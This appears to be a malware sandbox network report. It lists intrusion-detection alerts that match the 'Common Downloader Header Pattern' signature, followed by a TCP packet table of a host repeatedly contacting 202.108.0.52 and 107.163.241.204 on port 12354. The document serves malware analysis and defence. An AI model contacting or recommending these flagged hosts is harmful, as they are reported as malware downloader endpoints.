                                                      2024-12-11T16:26:33.766154+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959063202.108.0.5280TCP
                                                      2024-12-11T16:26:34.236624+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959061107.163.241.20412354TCP
                                                      2024-12-11T16:26:34.361167+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959074107.163.241.20412354TCP
                                                      2024-12-11T16:26:36.004804+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.961971202.108.0.5280TCP
                                                      2024-12-11T16:26:36.004817+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960939107.163.241.20412354TCP
                                                      2024-12-11T16:26:36.004900+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960826107.163.241.20412354TCP
                                                      2024-12-11T16:26:37.846600+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.962491202.108.0.5280TCP
                                                      2024-12-11T16:26:38.267623+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962420107.163.241.20412354TCP
                                                      2024-12-11T16:26:38.345685+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962477107.163.241.20412354TCP
                                                      2024-12-11T16:26:40.017452+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964620107.163.241.20412354TCP
                                                      2024-12-11T16:26:40.017466+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949463202.108.0.5280TCP
                                                      2024-12-11T16:26:40.017577+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964839107.163.241.20412354TCP
                                                      2024-12-11T16:26:41.926799+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950046202.108.0.5280TCP
                                                      2024-12-11T16:26:42.406739+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949910107.163.241.20412354TCP
                                                      2024-12-11T16:26:42.519950+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950045107.163.241.20412354TCP
                                                      2024-12-11T16:26:44.033810+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951593107.163.241.20412354TCP
                                                      2024-12-11T16:26:44.033850+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951424107.163.241.20412354TCP
                                                      2024-12-11T16:26:45.850702+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952122202.108.0.5280TCP
                                                      2024-12-11T16:26:46.283466+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952000107.163.241.20412354TCP
                                                      2024-12-11T16:26:46.400861+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952120107.163.241.20412354TCP
                                                      2024-12-11T16:26:48.072805+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.955883202.108.0.5280TCP
                                                      2024-12-11T16:26:48.072887+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954323107.163.241.20412354TCP
                                                      2024-12-11T16:26:48.072915+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954419107.163.241.20412354TCP
                                                      2024-12-11T16:26:49.940750+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956240202.108.0.5280TCP
                                                      2024-12-11T16:26:50.346777+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956239107.163.241.20412354TCP
                                                      2024-12-11T16:26:50.486220+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956241107.163.241.20412354TCP
                                                      2024-12-11T16:26:52.127576+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958669107.163.241.20412354TCP
                                                      2024-12-11T16:26:52.127599+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958756107.163.241.20412354TCP
                                                      2024-12-11T16:26:52.127621+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.960302202.108.0.5280TCP
                                                      2024-12-11T16:26:53.948394+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.960812202.108.0.5280TCP
                                                      2024-12-11T16:26:54.487042+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960813107.163.241.20412354TCP
                                                      2024-12-11T16:26:54.487186+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960811107.163.241.20412354TCP
                                                      2024-12-11T16:26:56.253311+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.963950202.108.0.5280TCP
                                                      2024-12-11T16:26:56.253329+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962747107.163.241.20412354TCP
                                                      2024-12-11T16:26:56.253376+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962754107.163.241.20412354TCP
                                                      2024-12-11T16:26:58.059484+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.964412202.108.0.5280TCP
                                                      2024-12-11T16:26:58.487871+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964340107.163.241.20412354TCP
                                                      2024-12-11T16:26:58.596067+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964411107.163.241.20412354TCP
                                                      2024-12-11T16:27:00.267470+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951307202.108.0.5280TCP
                                                      2024-12-11T16:27:00.267499+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949961107.163.241.20412354TCP
                                                      2024-12-11T16:27:00.267696+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950008107.163.241.20412354TCP
                                                      2024-12-11T16:27:02.176197+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951783202.108.0.5280TCP
                                                      2024-12-11T16:27:02.502711+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951627107.163.241.20412354TCP
                                                      2024-12-11T16:27:02.721139+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951781107.163.241.20412354TCP
                                                      2024-12-11T16:27:04.283021+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953449107.163.241.20412354TCP
                                                      2024-12-11T16:27:04.283070+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953250107.163.241.20412354TCP
                                                      2024-12-11T16:27:06.223009+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.954437202.108.0.5280TCP
                                                      2024-12-11T16:27:06.517930+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954167107.163.241.20412354TCP
                                                      2024-12-11T16:27:06.627499+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954268107.163.241.20412354TCP
                                                      2024-12-11T16:27:08.302686+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956076107.163.241.20412354TCP
                                                      2024-12-11T16:27:08.302725+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956250107.163.241.20412354TCP
                                                      2024-12-11T16:27:10.184978+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.957643202.108.0.5280TCP
                                                      2024-12-11T16:27:10.597110+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957568107.163.241.20412354TCP
                                                      2024-12-11T16:27:10.738514+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957657107.163.241.20412354TCP
                                                      2024-12-11T16:27:12.315448+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960035107.163.241.20412354TCP
                                                      2024-12-11T16:27:12.315483+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.961632202.108.0.5280TCP
                                                      2024-12-11T16:27:12.315546+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960195107.163.241.20412354TCP
                                                      2024-12-11T16:27:14.124924+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.962079202.108.0.5280TCP
                                                      2024-12-11T16:27:14.565598+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.961976107.163.241.20412354TCP
                                                      2024-12-11T16:27:14.661319+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962080107.163.241.20412354TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                      Dec 11, 2024 16:24:09.699378014 CET49927443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:09.699760914 CET49927443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:09.743330956 CET44349927202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:10.158858061 CET49927443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.158881903 CET4993212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.158901930 CET4992912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.159956932 CET4995212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.270926952 CET4990680192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.271322966 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.271991014 CET4995512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.279731989 CET1235449952107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:10.280953884 CET4995212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.281122923 CET4995212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.392920971 CET8049954202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:10.393393040 CET8049906202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:10.393428087 CET1235449955107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:10.393520117 CET4990680192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.393559933 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.393559933 CET4995512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.395219088 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:10.395332098 CET4995512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:10.403049946 CET1235449952107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:10.514823914 CET8049954202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:10.514839888 CET1235449955107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.056432962 CET8049954202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:12.056551933 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:12.058877945 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:12.058938980 CET44349975202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:12.059042931 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:12.059242010 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:12.059250116 CET44349975202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:12.390717983 CET1235449952107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.390865088 CET4995212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.390928030 CET4995212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.391756058 CET4997912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.510895967 CET1235449952107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.511128902 CET1235449979107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.511229038 CET4997912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.511389971 CET4997912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.624771118 CET1235449955107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.624896049 CET4995512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.625026941 CET4995512354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.625545979 CET4998312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.634639978 CET1235449979107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.744740963 CET1235449955107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.745023966 CET1235449983107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:12.745101929 CET4998312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.745274067 CET4998312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:12.864487886 CET1235449983107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:13.744360924 CET44349975202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:13.744518995 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:13.745038033 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:13.745052099 CET44349975202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:13.747045040 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:13.747056961 CET44349975202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:14.176673889 CET4998312354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.176738024 CET4997912354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.177059889 CET49975443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.179086924 CET5000012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.288912058 CET5000212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.300924063 CET1235450000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:14.301184893 CET5000012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.301184893 CET5000012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.339875937 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.340603113 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.416764975 CET1235450002107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:14.416862011 CET5000212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.417965889 CET5000212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:14.426685095 CET1235450000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:14.462896109 CET8050003202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:14.462913036 CET8049954202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:14.463041067 CET4995480192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.464888096 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.466578007 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:14.539480925 CET1235450002107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:14.587595940 CET8050003202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:16.057897091 CET8050003202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:16.057988882 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:16.060287952 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:16.060338974 CET44350022202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:16.060431004 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:16.060713053 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:16.060724020 CET44350022202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:16.422267914 CET1235450000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.422327995 CET5000012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.422946930 CET5000012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.423827887 CET5002812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.545809984 CET1235450000107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.546614885 CET1235450028107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.546721935 CET5002812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.547029018 CET5002812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.657459021 CET1235450002107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.657593012 CET5000212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.657674074 CET5000212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.658216000 CET5003212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.667443037 CET1235450028107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.778007030 CET1235450002107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.778043985 CET1235450032107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:16.778187037 CET5003212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.778321028 CET5003212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:16.897953033 CET1235450032107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:17.752456903 CET44350022202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:17.752587080 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:17.762478113 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:17.762523890 CET44350022202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:17.764230013 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:17.764241934 CET44350022202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:18.190232992 CET5002812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.190278053 CET5003212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.190324068 CET50022443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.191095114 CET5004812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.301354885 CET5005012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.314197063 CET1235450048107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:18.314354897 CET5004812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.315104961 CET5004812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.316607952 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.316845894 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.428916931 CET1235450050107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:18.429038048 CET5005012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.442328930 CET1235450048107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:18.442789078 CET8050051202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:18.442800045 CET8050003202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:18.442897081 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.442930937 CET5000380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.452539921 CET5005012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:18.452672005 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:18.571835041 CET1235450050107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:18.572875977 CET8050051202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:20.017344952 CET8050051202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:20.017509937 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:20.019968987 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:20.020015001 CET44350072202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:20.020090103 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:20.020304918 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:20.020314932 CET44350072202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:20.459877968 CET1235450048107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.459980965 CET5004812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.470808029 CET5004812354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.471128941 CET5007712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.547117949 CET1235450050107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.547172070 CET5005012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.547349930 CET5005012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.583774090 CET5008012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.593839884 CET1235450048107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.593985081 CET1235450077107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.594058990 CET5007712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.594185114 CET5007712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.666687012 CET1235450050107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.703727007 CET1235450080107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.703850031 CET5008012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.703990936 CET5008012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:20.713655949 CET1235450077107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:20.823926926 CET1235450080107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:21.736713886 CET44350072202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:21.736835003 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:21.737276077 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:21.737298965 CET44350072202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:21.738941908 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:21.738965034 CET44350072202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:22.233335972 CET50072443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.233432055 CET5008012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.233453035 CET5007712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.236337900 CET5010012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.350589991 CET5010212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.350980997 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.351182938 CET5010380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.356138945 CET1235450100107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:22.356225967 CET5010012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.356342077 CET5010012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.470391989 CET1235450102107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:22.470567942 CET5010212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.470645905 CET8050103202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:22.470657110 CET8050051202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:22.470695972 CET5010380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.470730066 CET5005180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.471931934 CET5010212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:22.472050905 CET5010380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:22.476315975 CET1235450100107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:22.591667891 CET1235450102107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:22.591686010 CET8050103202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:24.055720091 CET8050103202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:24.055802107 CET5010380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:24.066108942 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:24.066168070 CET44350122202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:24.066237926 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:24.067965984 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:24.067987919 CET44350122202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:24.482472897 CET1235450100107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.482620001 CET5010012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.482641935 CET5010012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.482999086 CET5012712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.593990088 CET1235450102107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.594049931 CET5010212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.594237089 CET5010212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.602014065 CET1235450100107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.602247953 CET1235450127107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.602307081 CET5012712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.615520000 CET5012712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.632047892 CET5013012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.713582993 CET1235450102107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.735022068 CET1235450127107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.752780914 CET1235450130107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:24.752913952 CET5013012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.783198118 CET5013012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:24.902640104 CET1235450130107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:25.840725899 CET44350122202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:25.840872049 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:25.841310024 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:25.841315985 CET44350122202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:25.843084097 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:25.843090057 CET44350122202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:26.236604929 CET5013012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.236653090 CET50122443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:26.236679077 CET5012712354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.238157034 CET5015012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.351481915 CET5015212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.351661921 CET5010380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:26.351871967 CET5015380192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:26.360894918 CET1235450150107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:26.360991001 CET5015012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.361162901 CET5015012354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.471088886 CET1235450152107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:26.471219063 CET5015212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.471364975 CET5015212354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:26.471375942 CET8050153202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:50.693789959 CET5045180192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:50.694227934 CET5052080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:50.695718050 CET1235450521107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:50.695837975 CET5052112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:50.696141958 CET5052112354192.168.2.9107.163.241.204
                                                      Dec 11, 2024 16:24:50.696176052 CET1235450517107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:50.814816952 CET8050520202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:50.816565990 CET1235450521107.163.241.204192.168.2.9
                                                      Dec 11, 2024 16:24:52.271370888 CET8050520202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:52.271420956 CET5052080192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:52.277008057 CET50561443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:52.277057886 CET44350561202.108.0.52192.168.2.9
                                                      Dec 11, 2024 16:24:52.277117014 CET50561443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:52.277499914 CET50561443192.168.2.9202.108.0.52
                                                      Dec 11, 2024 16:24:52.277512074 CET44350561202.108.0.52192.168.2.9
